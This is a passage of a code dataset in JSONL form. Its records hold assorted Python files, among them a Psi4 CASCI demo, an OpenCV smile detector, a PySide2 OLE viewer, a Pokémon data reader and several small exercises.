59.36011874867746\nbc_ref_point = [18., 6.]\n\nbo = SMBO(branin_currin, bc_cs,\n advisor_type='mcadvisor',\n task_id='mcparego',\n num_objs=2,\n acq_type='mcparego',\n ref_point=bc_ref_point,\n max_runs=100, random_state=2)\nbo.run()\n\nhvs = bo.get_history().hv_data\nlog_hv_diff = np.log10(bc_max_hv - np.asarray(hvs))\n\nimport matplotlib.pyplot as plt\nplt.plot(log_hv_diff)\n# plt.savefig('plt.pdf')\nplt.show()\n","sub_path":"test/optimizer/test_smbo_mcparego.py","file_name":"test_smbo_mcparego.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"413586674","text":"from pysvg.builders import Svg, ShapeBuilder, StyleBuilder\nfrom pysvg.text import *\n\ndef createblock(number):\n colors = {}\n colors[2]=('#eee4da','#776e65')\n colors[4]=('#ede0c8','#776e65')\n colors[8]=('#f2b179','#f9f6f2')\n colors[16]=('#f59563','#f9f6f2')\n colors[32]=('#f67c5f','#f9f6f2')\n colors[64]=('#f65e3b','#f9f6f2')\n colors[128]=('#edcf72','#f9f6f2')\n colors[256]=('#edcc61','#f9f6f2')\n colors[512]=('#eee4da','#776e65')\n colors[1024]=('#edc53f','#f9f6f2')\n colors[2048]=('#edc22e','#f9f6f2')\n \n canvas = Svg(0,0,100,100)\n sb = ShapeBuilder()\n canvas.addElement( sb.createRect(5,5,90,90,fill=colors[number][0]) )\n \n t = Text(number,50,60)\n t.set_style(\"font-family:FreeSans;font-weight:bold;font-size:36px;text-anchor:middle\")\n t.set_fill(colors[number][1])\n canvas.addElement(t)\n canvas.save('/tmp/try7.svg')\n\n\ncreateblock(128)\n","sub_path":"2048/ui/mainui_2.py","file_name":"mainui_2.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268214416","text":"import unittest\n\nfrom pykev.lib.leet_code.complex_multiple__537 import multiply_complex\n\nclass TestComplexNumberMultiplication(unittest.TestCase):\n def test_multiply_complex(self):\n TEST_CASES = [\n ((\"1+1i\", \"1+1i\"), \"0+2i\"),\n ((\"1+-1i\", \"1+-1i\"), \"0+-2i\"),\n ]\n\n for args, expected in TEST_CASES:\n output = multiply_complex(*args)\n\n assert output == expected, '{a}: {o} != {e}'.format(\n a=args,\n o=output,\n e=expected,\n )\n\n 
return\n","sub_path":"test/test_leet_code/test_537.py","file_name":"test_537.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25343914","text":"import cv2\n\n\n# Loading the cascades. xml files\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\nsmile_cascade = cv2.CascadeClassifier('haarcascade_smile.xml')\n\n# Define functions that will do the detections.\n\n# will take input of images coming from the webcam.\n# NOTE: Cascades work o black and white image.\n# So accepting the image here in black and white (gray)\n# and also the original image\ndef detect(gray, frame):\n\t# Get the coordinates of the rectangle which detect the face.\n\n\t# x, y are the coordiantes on the upper left corner.\n\t# w and h are the width and height respectively.\n\t# x, y, w, h = \n\n\t# detectMultiScale method takes the gray image.and \n\t# other arguments include the factor by which image size is going to be reduced.\n\t# min. no. neighbours.\n\n\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\t# print (faces) # tuples (x,y,w,h)\n\n\tfor (x,y,w,h) in faces:\n\t\t# Draw the rectangle for the faces.\n\t\tcv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)\n\n\t\t# Eyes will be detected where we have found our face.\n\t\t# So we will perform our tests on the face's referential frame in order to save the computational time.\n\n\t\t# We will be taking to region of interest. The gray scale image and the colored image.\n\n\t\troi_gray = gray[y:y+h, x:x+w]\n\t\troi_color = frame[y:y+h, x:x+w]\n\n\t\t# Detecting the eyes.\n\t\teyes = eye_cascade.detectMultiScale(roi_gray, 1.1, 22)\n\n\t\tfor (ex, ey, ew, eh) in eyes:\n\t\t\tcv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0,255,0), 2)\n\n\t\t# Smile detector.\n\t\tsmile = smile_cascade.detectMultiScale(roi_gray, 1.7, 22)\n\n\t\tfor (sx, sy, sw, sh) in smile:\n\t\t\tcv2.rectangle(roi_color, (sx, sy), (sx+sw, sy+sh), (0,0,255), 2)\n\n\treturn frame\n\n# DO face recognition using webcam.\n# We will apply this function to the last frame coming on the webcam.\n\nvideo_capture = cv2.VideoCapture(0) # 0 for computer webcam.\n\nwhile True:\n\t_, last_frame = video_capture.read()\n\t# convert to gray scale\n\tgray = cv2.cvtColor(last_frame, cv2.COLOR_BGR2GRAY)\n\n\tcanvas = detect(gray, last_frame)\n\n\tcv2.imshow('Video', canvas)\n\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n","sub_path":"open_files/smile_detection.py","file_name":"smile_detection.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71679579","text":"import math\nfrom itertools import izip, chain\nfrom copy import copy\n\n\ndef sigmoid(x, bias, gain):\n x = max(-60.0, min(60.0, x))\n return 1. / ( 1. 
+ math.exp( -gain * (x - bias) ) )\n\n\nclass Node(object):\n def __init__(self):\n self.value = 0\n self._new_value = 0\n self.inputs = []\n\n def reset(self, value):\n self.value = value\n self._new_value = value\n\n def flip(self):\n self.value = self._new_value\n\n def add_input(self, input_node, weight):\n self.inputs.append((input_node, weight))\n\n\nclass InputNode(Node): pass\n\n\nclass ComputeNode(Node):\n def __init__(self, act_func):\n super(ComputeNode, self).__init__()\n self.act_func = act_func\n\n def compute(self):\n in_value = 0\n for inp, weight in self.inputs:\n in_value += inp.value * weight\n\n self._new_value = self.act_func(in_value)\n\n\nclass NN:\n\n\n def __init__(self):\n self.in_nodes = []\n self.comp_nodes = []\n self.out_nodes = []\n\n\n def from_genome(self, genome):\n\n nodes = {}\n\n for ng in genome.neuron_genes:\n if ng.gene_type == 'sigmoid':\n\n node = ComputeNode(\n act_func = lambda x, bias=ng.bias, gain=ng.gain: sigmoid(x, bias, gain)\n )\n\n # output nodes go in both compute list and output list\n # hidden nodes only go in compute list\n if ng.layer in ['hidden', 'output']:\n self.comp_nodes.append(node)\n if ng.layer == 'output':\n self.out_nodes.append(node)\n\n elif ng.gene_type == 'input':\n node = InputNode()\n self.in_nodes.append(node)\n\n nodes[ng.historical_mark] = node\n\n for cg in genome.connection_genes:\n nodes[cg.mark_to].add_input(nodes[cg.mark_from], cg.weight)\n\n return self\n\n\n def reset(self):\n # reset node values\n for node in chain(self.in_nodes, self.comp_nodes, self.out_nodes):\n node.reset(0)\n\n\n def compute(self, inputs):\n # set inputs\n for in_node, in_value in izip(self.in_nodes, inputs):\n in_node.reset(in_value)\n\n # compute\n for _ in range(2):\n for node in self.comp_nodes: node.compute()\n for node in self.comp_nodes: node.flip()\n\n # get outputs\n return list(out_node.value for out_node in self.out_nodes)","sub_path":"examples/nn_impl.py","file_name":"nn_impl.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"184902348","text":"# ===============================================================================\n# Copyright 2014 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============================================================================\n\n# ============= enthought library imports =======================\nfrom traits.api import Instance, Enum, Any, List\n\n# ============= standard library imports ========================\n# ============= local library imports ==========================\nfrom pychron.loggable import Loggable\nfrom pychron.processing.export.exporter import Exporter\nfrom pychron.processing.export.massspec_analysis_exporter import MassSpecAnalysisExporter\nfrom pychron.processing.export.sqlite_analysis_exporter import SQLiteAnalysisExporter\nfrom pychron.processing.export.xml_analysis_exporter import XMLAnalysisExporter\nfrom 
pychron.processing.export.yaml_analysis_exporter import YAMLAnalysisExporter\n\nEX_KLASS_DICT = {'MassSpec': MassSpecAnalysisExporter,\n 'XML': XMLAnalysisExporter,\n 'YAML': YAMLAnalysisExporter,\n 'SQLite': SQLiteAnalysisExporter}\n\n\nclass ExportManager(Loggable):\n kind = Enum('SQLite', 'XML', 'MassSpec', 'YAML')\n exporter = Instance(Exporter)\n manager = Any\n\n exported_analyses = List\n\n def export(self, ans):\n if self.exporter.start_export():\n n = len(ans)\n prog = self.manager.open_progress(n)\n for ei in ans:\n self._export_analysis(ei, prog)\n self.exported_analyses.append(ei)\n self.exporter.export()\n prog.close()\n else:\n self.warning('Export failed to start')\n\n # def _make_export_spec(self, ai):\n # ai = self.manager.make_analysis(ai, calculate_age=True,\n # unpack=True,\n # use_cache=False)\n\n # return self.exporter.make_spec(ai)\n\n # rs_name, rs_text=assemble_script_blob()\n # rs_name, rs_text = '', ''\n # rid = ai.record_id\n # exp = MassSpecExportSpec(runid=rid,\n # runscript_name=rs_name,\n # runscript_text=rs_text,\n # mass_spectrometer=ai.mass_spectrometer.capitalize(),\n # isotopes=ai.isotopes)\n #\n # exp.load_record(ai)\n # return exp\n\n def _exporter_default(self):\n return SQLiteAnalysisExporter(iso_manager=self.manager)\n\n def _kind_changed(self):\n\n try:\n klass = EX_KLASS_DICT[self.kind]\n self.exporter = klass()\n if self.kind == 'SQLite':\n self.exporter.iso_manager = self.manager\n\n except KeyError:\n self.warning_dialog('invalid kind {}. available={}'.format(self.kind,\n ','.join(EX_KLASS_DICT.keys())))\n # if self.kind == 'MassSpec':\n # self.exporter = MassSpecExporter()\n # elif\n # else:\n # self.exporter = XMLAnalysisExporter()\n\n def _export_analysis(self, ai, prog):\n # db=self.manager.db\n # with db.session_ctx():\n # dest=self.destination\n # espec = self._make_export_spec(ai)\n self.exporter.add(ai)\n prog.change_message('Export analysis {}'.format(ai.record_id))\n\n# ============= EOF =============================================\n\n","sub_path":"pychron/processing/export/export_manager.py","file_name":"export_manager.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"379190837","text":"# This gives us control of the Raspberry Pi's pins.\n# This is only used for time delays... 
standard Python stuff.\n\nimport RPi.GPIO as GPIO\n\npin_number = 35\nfrequency_hertz = 50\nleft_position = 0.40\nright_position = 2.5\nms_per_cycle = 1000 / frequency_hertz\n\n\nclass ServoControl:\n wasSet = False\n pwm = None\n\n def initGpio(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(pin_number, GPIO.OUT)\n self.pwm = GPIO.PWM(pin_number, frequency_hertz)\n self.pwm.start(0)\n\n def set(self, value):\n if not self.wasSet:\n print('init gpio')\n self.initGpio()\n self.wasSet = True\n print('setting to {}'.format(value))\n position = left_position + (right_position - left_position) * (value + 100) / 200\n self.pwm.start(position * 100 / ms_per_cycle)\n\n def shutdown(self):\n self.pwm.stop()\n GPIO.cleanup()\n\n\nSERVO_CONTROL = ServoControl()\n","sub_path":"mzdriver/servo_control.py","file_name":"servo_control.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"83821136","text":"# ==========================================================================================\n# ==========================================================================================\n# \n# A code to demonstrate how to implement a CASCI method with \n# the QuantNBody package on the LiH molecule.\n# The results are compared to the FCI method already implemented in the\n# Psi4 quantum chemistry package.\n#\n# Author : Saad Yalouz\n# ==========================================================================================\n# ==========================================================================================\n\nimport numpy as np \nimport psi4 \nimport math\nimport scipy \nimport matplotlib.pyplot as plt\nimport sys \nsys.path.append('../')\n\nimport quantnbody as qnb\n\ndef RUN_CASCI_PSI4( string_geo,\n basisset, \n active_indices,\n frozen_indices,\n virtual_indices ):\n '''\n A function to run a CASCI method with the Psi4 package\n ''' \n \n psi4.geometry( string_geo )\n psi4.set_options({ 'basis': basisset, \n 'reference': 'RHF',\n 'scf_type': 'DIRECT', # set e_convergence and d_convergence to 1e-8 instead of 1e-6\n 'num_roots': 2, \n 'frozen_docc' : [ len(frozen_indices) ],\n 'active' : [ len(active_indices) ], \n 'frozen_uocc' : [ len(virtual_indices) ], \n 'S' : 0 })\n \n Escf, wfnSCF = psi4.energy('scf', return_wfn=True)\n casci, casci_wfn = psi4.energy('fci',return_wfn=True)\n\n E0_casci = psi4.variable('CI ROOT 0 TOTAL ENERGY')\n E1_casci = psi4.variable('CI ROOT 1 TOTAL ENERGY')\n \n return E0_casci, E1_casci \n\n#%%\n\npsi4.core.set_output_file(\"output_Psi4.txt\", False)\n\n#========================================================|\n# Parameters for the simulation\n# General Quantum chemistry parameters =======\nbasisset = 'sto-3g'\nnelec_active = 2 # Number of active electrons in the Active-Space \nfrozen_indices = [ i for i in range(1) ]\nactive_indices = [ i for i in range(1,3) ]\nvirtual_indices = [ i for i in range(3,6) ] \n\n# Dimension of the many-body space \ndim_H = math.comb( 2*len(active_indices) , nelec_active ) \n\n# Building the Many-body basis \nnbody_basis = qnb.fermionic.tools.build_nbody_basis( len(active_indices) , nelec_active )\n\n# Building the matrix representation of the adagger_a operator in the many-body basis \na_dagger_a = qnb.fermionic.tools.build_operator_a_dagger_a( nbody_basis )\n\n# Building the matrix representation of several interesting spin operators in the many-body basis \nS_2, S_p, S_Z = qnb.fermionic.tools.build_s2_sz_splus_operator( a_dagger_a 
)\n\n#%%\n \nlist_r = np.linspace(0.25, 2.2, 10) \n\nE_0_qnb = []\nE_1_qnb = []\n\nfor r in ( list_r ): \n \n #========================================================|\n # Molecular geometry / Quantum chemistry calculations \n # Li-H geometry \n string_geo = \"\"\"Li 0 0 0\n H 0 0 {}\n symmetry c1 \"\"\".format( r )\n \n molecule = psi4.geometry(string_geo) \n psi4.set_options({'basis' : basisset,\n 'reference' : 'rhf',\n 'SCF_TYPE' : 'DIRECT' })\n \n scf_e, scf_wfn = psi4.energy( 'HF', molecule=molecule, return_wfn=True, verbose=0 )\n E_rep_nuc = molecule.nuclear_repulsion_energy()\n C_RHF = np.asarray(scf_wfn.Ca()).copy() # MO coeff matrix from the initial RHF calculation\n mints = psi4.core.MintsHelper(scf_wfn.basisset()) # Get AOs integrals using MintsHelper\n Num_AO = np.shape(np.asarray(mints.ao_kinetic()))[0] \n\n #%%\n # Construction of the first reference Hamiltonian / MO integrals\n C_ref = C_RHF # Initial MO coeff matrix \n \n # Storing the 1/2-electron integrals in the original AO basis\n h_AO = np.asarray(mints.ao_kinetic()) + np.asarray(mints.ao_potential()) \n g_AO = np.asarray(mints.ao_eri()).reshape(( Num_AO, Num_AO, Num_AO, Num_AO )) \n \n h_MO, g_MO = qnb.fermionic.tools.transform_1_2_body_tensors_in_new_basis( h_AO, g_AO, C_ref )\n \n E_core, h_, g_ = qnb.fermionic.tools.qc_get_active_space_integrals(h_MO,\n g_MO,\n frozen_indices = frozen_indices,\n active_indices = active_indices)\n #%%\n # Building the matrix representation of the Hamiltonian operators \n H = qnb.fermionic.tools.build_hamiltonian_quantum_chemistry(h_,\n g_,\n nbody_basis,\n a_dagger_a,\n S_2=S_2,\n S_2_target=0,\n penalty=100)\n \n eig_en, eig_vec = scipy.linalg.eigh( H.A )\n E_0_qnb += [ eig_en[0] + E_core + E_rep_nuc ]\n E_1_qnb += [ eig_en[1] + E_core + E_rep_nuc ]\n \n# =======================================================|\n# SIMILAR CALCULATION WITH THE PSI4 package =============|\n#========================================================|\nE_0_psi4 = [ ]\nE_1_psi4 = [ ]\nfor r in ( list_r ): \n \n #========================================================|\n # Molecular geometry / Quantum chemistry calculations\n # Clean all previous options for psi4\n \n string_geo = \"\"\"Li 0 0 0\n H 0 0 {}\n symmetry c1 \"\"\".format( r )\n \n E0_casci, E1_casci = RUN_CASCI_PSI4( string_geo,\n basisset, \n active_indices,\n frozen_indices,\n virtual_indices )\n\n E_0_psi4 += [ E0_casci ]\n E_1_psi4 += [ E1_casci ]\n\n#%%\n \nplt.rc('font', family='Helvetica')\nplt.rc('mathtext', fontset='stix')\nplt.rc('xtick', labelsize='xx-large')\nplt.rc('ytick', labelsize='xx-large')\nplt.rc('lines', linewidth='2')\n\nfig, (ax1) = plt.subplots(nrows=1, ncols=1, figsize=(8, 6)) \nax1.plot( list_r, E_0_psi4, color='red', label='$E_0^{psi4}$')\nax1.plot( list_r, E_1_psi4, color='red', label='$E_1^{psi4}$')\nax1.plot( list_r, E_0_qnb, color='blue', ls=':', marker='o', label='$E_0^{qnb}$')\nax1.plot( list_r, E_1_qnb, color='blue', ls=':', marker='o', label='$E_1^{qnb}$')\nax1.set_xlabel('Intertatomic distance $r_{Li-H}$ ($\\AA$) ', size=22)\nax1.set_ylabel('Energy (Ha)', size=22)\nax1.set_ylim(-8,-5)\nax1.legend(fontsize='x-large')\nax1.grid()\nplt.show()\n","sub_path":"Tutorials/Examples_chemistry/Demo_CASCI_LiH.py","file_name":"Demo_CASCI_LiH.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"336024004","text":"import re\n\nclass RejestracjaKart():\n def __init__(self):\n self._Idkarty = ''\n\n\n def sprawdzCzyWBazie(self, 
_Idkarty):\n res = 'Nie'\n try:\n with open('Karty.csv', encoding='utf-8', mode='r') as file_obj:\n for line in file_obj:\n if line.replace('\\n', '') == _Idkarty:\n res = 'Tak'\n break\n file_obj.close()\n return res\n except FileNotFoundError:\n res = 'Blad'\n return res\n\n\n def dodajDoBazy(self, _Idkarty):\n flag = self.sprawdzCzyWBazie(_Idkarty)\n if flag == 'Nie':\n if len(_Idkarty) == 6:\n if re.match(r'KN[0-9]{4}', _Idkarty):\n\n with open('Karty.csv', encoding='utf-8', mode='a') as file_obj:\n file_obj.write('\\n'+_Idkarty)\n file_obj.close()\n return self.poinformujOWyniku(1)\n else:\n return self.poinformujOWyniku(2)\n else:\n return self.poinformujOWyniku(2)\n elif flag == 'Tak':\n return self.poinformujOWyniku(3)\n else:\n return self.poinformujOWyniku(4)\n\n\n def poinformujOWyniku(self, czyPozytywny):\n if czyPozytywny == 1:\n return 'Dodano nową kartę.'\n elif czyPozytywny == 2:\n return 'Karta o niepoprawnym formacie.'\n elif czyPozytywny == 3:\n return 'Karta istnieje już w bazie.'\n elif czyPozytywny == 4:\n return 'Brak połączenia z bazą kart.'\n else:\n return 'Nieznany błąd.'\n\n","sub_path":"RejestracjaKart.py","file_name":"RejestracjaKart.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"487522927","text":"import numpy as np\r\nimport math\r\nimport random\r\nfrom astropy.table import Table, Column\r\n\r\nA = [[1, 2, 3],\r\n [2, 3, 4],\r\n [4, 5, 6],\r\n [1, 1, 1]]\r\n\r\nAT = np.transpose(A)\r\n\r\nb = [1, 1, 1, 1]\r\n\r\n# These store the values of x and number of iterations over each trial (for the table)\r\nxList = list()\r\ncountList = list()\r\n\r\n# Generates a starting x vector with random numbers normally distributed around the origin\r\ndef generateRandomX():\r\n x = list()\r\n for i in range (3):\r\n x.append(random.normalvariate(0, 2))\r\n return x\r\n\r\ndef gradientDescent (stepSize, tolerance):\r\n x = generateRandomX()\r\n \r\n count = 0\r\n while (1):\r\n change = np.matmul(AT, np.matmul(A, x)) - np.matmul(AT, b)\r\n if math.isinf(np.linalg.norm(change, 2)):\r\n x = \"Could Not Converge (step size too large)\"\r\n break\r\n if np.linalg.norm(change, 2) <= tolerance:\r\n break\r\n\r\n x = np.subtract(x, stepSize * change)\r\n count += 1\r\n \r\n xList.append(str(x))\r\n countList.append(str(count))\r\n\r\n\r\ngradientDescent(0.01, 0.01)\r\ngradientDescent(0.05, 0.01)\r\ngradientDescent(0.1, 0.01)\r\ngradientDescent(0.15, 0.01)\r\ngradientDescent(0.2, 0.01)\r\ngradientDescent(0.25, 0.01)\r\ngradientDescent(0.5, 0.01)\r\n\r\n\r\n\r\nt = Table()\r\nt['Values of x'] = xList\r\nt['Number of Iterations'] = countList\r\nprint(t)\r\n","sub_path":"a1/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"312704151","text":"# -*- coding: utf-8 -*-\n\n\nfrom PySide2.QtWidgets import (\n QMainWindow,\n QMdiArea,\n QTabBar,\n QFileDialog,\n QMessageBox,\n QApplication,\n QVBoxLayout,\n QWidget)\nfrom PySide2.QtGui import (\n QKeySequence,\n QIcon)\nfrom PySide2.QtCore import (\n QSize)\n\nfrom .oleview import OleView\nfrom .oledocument import OleDocument\nfrom .stylehelper import dpiScaled\nfrom .oleevents import SelectionChangedEvent\nfrom .aboutdialog import AboutDialog\n\n\nclass OleWindow(QMainWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setWindowTitle(self.tr(\"OLE Editor\"))\n 
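# Editor's note, hedged: dpiScaled (from stylehelper) presumably converts the\n        # 880x510 design size for high-DPI displays so the window keeps its intended\n        # proportions; this is inferred from the helper's name, not verified here.\n        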
self.resize(dpiScaled(QSize(880, 510)))\n\n self._mdiArea = QMdiArea(self)\n self._tabBar = QTabBar(self)\n self._tabBar.setExpanding(False)\n self._tabBar.setTabsClosable(True)\n\n centralWidget = QWidget(self)\n vbox = QVBoxLayout(centralWidget)\n vbox.setMargin(0)\n vbox.addWidget(self._tabBar)\n vbox.addWidget(self._mdiArea)\n\n self.setCentralWidget(centralWidget)\n\n self._initMenu()\n\n self._mdiArea.subWindowActivated.connect(\n self._onSubWindowActivated)\n\n self._tabBar.currentChanged.connect(\n self._onCurrentTabChanged)\n self._tabBar.tabCloseRequested.connect(\n self._onTabCloseRequested)\n\n def _initMenu(self):\n fileMenu = self.menuBar().addMenu(self.tr(\"&File\"))\n ac = fileMenu.addAction(self.tr(\"&Open\"),\n self.onFileMenuOpen,\n QKeySequence(\"Ctrl+O\"))\n ac.setIcon(QIcon.fromTheme(\"document-open\"))\n fileMenu.addSeparator()\n ac = fileMenu.addAction(self.tr(\"&Quit\"),\n self.onFileMenuQuit,\n QKeySequence(\"Ctrl+Q\"))\n ac.setIcon(QIcon.fromTheme(\"application-exit\"))\n\n editMenu = self.menuBar().addMenu(self.tr(\"&Edit\"))\n ac = editMenu.addAction(self.tr(\"&Copy\"),\n self.onEditMenuCopy,\n QKeySequence(\"Ctrl+C\"))\n ac.setIcon(QIcon.fromTheme(\"edit-copy\"))\n self._acCopy = ac\n self._acCopy.setEnabled(False)\n\n helpMenu = self.menuBar().addMenu(self.tr(\"&Help\"))\n ac = helpMenu.addAction(self.tr(\"&About\"),\n self.onHelpMenuAbout)\n ac.setIcon(QIcon.fromTheme(\"help-about\"))\n helpMenu.addAction(self.tr(\"About &Qt\"),\n QApplication.aboutQt)\n\n def onFileMenuOpen(self):\n files, _ = QFileDialog.getOpenFileNames(\n self,\n self.tr(\"Open OLE Files\"),\n filter=self.tr(\"All Files\") + \" (*.*)\")\n for file in files:\n self.openFile(file)\n\n def onFileMenuQuit(self):\n self.close()\n\n def onEditMenuCopy(self):\n curSubWnd = self._mdiArea.activeSubWindow()\n curSubWnd.widget().editor.copy()\n\n def onHelpMenuAbout(self):\n aboutDialog = AboutDialog(self)\n aboutDialog.exec()\n\n def _onSubWindowActivated(self, subWin):\n enabled = subWin.widget().editor.hasSelection() if subWin else False\n self._acCopy.setEnabled(enabled)\n\n if not subWin:\n return\n index = self._mdiArea.subWindowList().index(subWin)\n if self._tabBar.currentIndex() != index:\n self._tabBar.setCurrentIndex(index)\n\n def _onCurrentTabChanged(self, index):\n if index < 0:\n return\n\n subWindows = self._mdiArea.subWindowList()\n if index >= len(subWindows):\n return\n\n self._mdiArea.setActiveSubWindow(subWindows[index])\n\n def _onTabCloseRequested(self, index):\n subWindows = self._mdiArea.subWindowList()\n subWindows[index].close()\n self._tabBar.removeTab(index)\n\n def openFile(self, filePath):\n subWin = self.getSubWinByFilePath(filePath)\n if subWin:\n self._mdiArea.setActiveSubWindow(subWin)\n return\n\n if not OleDocument.isOleFile(filePath):\n QMessageBox.critical(self,\n self.windowTitle(),\n self.tr(\"'{}' is not an OLE2 structed storage file!\").format(filePath))\n return\n\n doc = OleDocument()\n if not doc.open(filePath):\n QMessageBox.critical(self,\n self.windowTitle(),\n self.tr(\"Failed to open file: '{}'!\").format(filePath))\n return\n\n view = OleView(doc, self)\n subWin = self._mdiArea.addSubWindow(view)\n self._tabBar.addTab(subWin.windowIcon(), self.tabTitleFor(subWin))\n subWin.showMaximized()\n\n def getSubWinByFilePath(self, filePath):\n subWindows = self._mdiArea.subWindowList()\n for sw in subWindows:\n if sw.widget().getFilePath() == filePath:\n return sw\n\n return None\n\n def event(self, event):\n if event.type() == 
SelectionChangedEvent.Type:\n curSubWnd = self._mdiArea.activeSubWindow()\n if curSubWnd and curSubWnd.widget() == event.view:\n self._acCopy.setEnabled(event.view.editor.hasSelection())\n return True\n\n return super().event(event)\n\n def tabTitleFor(self, subWindow):\n return subWindow.windowTitle()\n","sub_path":"oleeditor/olewindow.py","file_name":"olewindow.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613335501","text":"\"\"\"\nInitiallize input names (See pattern below):\n\n>>> initials('code wars')\n'C.Wars'\n>>> initials('Barack Hussain obama')\n'B.H.Obama'\n\n\"\"\"\n\ndef initials(name):\n\n\tname_list = name.split(\" \")\n\tinitials_str = \"\"\n\n\tfor i in range(len(name_list)-1):\n\t\tinitials_str = initials_str + name_list[i][0].upper() + \".\"\n\n\treturn initials_str + name_list[-1].title()\n\n\nif __name__ == \"__main__\":\n\timport doctest\n\tdoctest.testmod()","sub_path":"cw/cw_7_cWarsInitials.py","file_name":"cw_7_cWarsInitials.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163803329","text":"import io\nimport signal\nimport sys\nimport tkinter as tk\nimport pokebase as pb\n\n# Go to root of PyNTRReader\nsys.path.append('../')\n\nfrom ntrreader import G6Reader\nfrom PIL import Image, ImageTk\nfrom structure import PK6\nfrom ip import IP_ADDR\n\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master = master\n self.pack()\n self.create_widgets()\n self.last_info = \"\"\n signal.signal(signal.SIGINT, self.signal_handler)\n\n def create_widgets(self):\n self.master.title(\"Transporter Reader\")\n self.type_var = tk.IntVar()\n self.connect_button = tk.Button(self, text=\"Connect\", fg=\"green\", command=self.connect)\n self.connect_button.grid(column=0,row=1)\n self.current_info_display = tk.Text(self,height=5)\n self.current_info_display.grid(column=2, row=2, rowspan=3)\n self.image_display = tk.Label(self)\n self.image_display.grid(column=0, row=2, columnspan=2, rowspan=3)\n self.quit = tk.Button(self, text=\"Disconnect\", fg=\"red\", command=self.disconnect)\n self.quit.grid(column=1,row=1)\n\n def connect(self):\n print(\"Connecting to: \", IP_ADDR)\n self.G6Reader = G6Reader(IP_ADDR)\n self.update()\n\n def disconnect(self):\n print(\"Disconnecting\")\n self.after_cancel(self.after_token)\n self.G6Reader.close(False)\n self.G6Reader = None\n \n def signal_handler(self, signal, frame):\n self.disconnect()\n sys.exit(0)\n \n def update(self):\n read_func = self.G6Reader.readTransporter\n\n try:\n pk6 = PK6(read_func())\n error = False\n except Exception as e:\n print(e)\n error = True\n while error:\n try:\n pk6 = PK6(read_func())\n error = False\n except:\n error = True\n \n if not pk6.isValid:\n print(\"Invalid or Not Present\")\n self.last_info = \"\"\n self.image_display.config(image='')\n self.current_info_display.delete(1.0, tk.END)\n elif str(pk6) != self.last_info:\n info = str(pk6)\n s1 = pb.SpriteResource('pokemon', pk6.species, shiny=pk6.shinyType).img_data\n im = Image.open(io.BytesIO(s1)).convert('RGBA')\n image = ImageTk.PhotoImage(im)\n self.image = image\n self.image_display.config(image=image)\n self.last_info = info\n self.current_info_display.delete(1.0, tk.END)\n self.current_info_display.insert(1.0, info)\n self.after_token = self.after(1000, self.update)\n\nroot = tk.Tk()\napp = 
Application(master=root)\napp.mainloop()","sub_path":"scripts/GUITransporter.py","file_name":"GUITransporter.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81381882","text":"class DayError(Exception):\r\n pass\r\nclass MonthError(Exception):\r\n pass\r\n\r\nwhile True:\r\n try:\r\n date = input(\"Введите дату в формате дд.мм.гггг: \")\r\n day, month, year = int(date[:2]), int(date[3:5]), int(date[6:])\r\n # print(day, month, year)\r\n if month in [1, 3, 5, 7, 8, 10, 12]:\r\n if day < 1 or day > 31:\r\n raise DayError\r\n elif month in [4, 6, 9, 11]:\r\n if day < 1 or day > 30:\r\n raise DayError\r\n elif month == 2:\r\n if (year % 4 == 0 and year % 100 != 0) or (year % 400 == 0):\r\n if day < 1 or day > 29:\r\n raise DayError\r\n else:\r\n if day < 1 or day > 28:\r\n raise DayError\r\n else:\r\n raise MonthError\r\n\r\n if (day >= 21 and month == 3) or (day <= 19 and month == 4):\r\n print(\"Ты - овен!\")\r\n elif (day >= 20 and month == 4) or (day <= 20 and month == 5):\r\n print(\"Ты - телец!\")\r\n elif (day >= 21 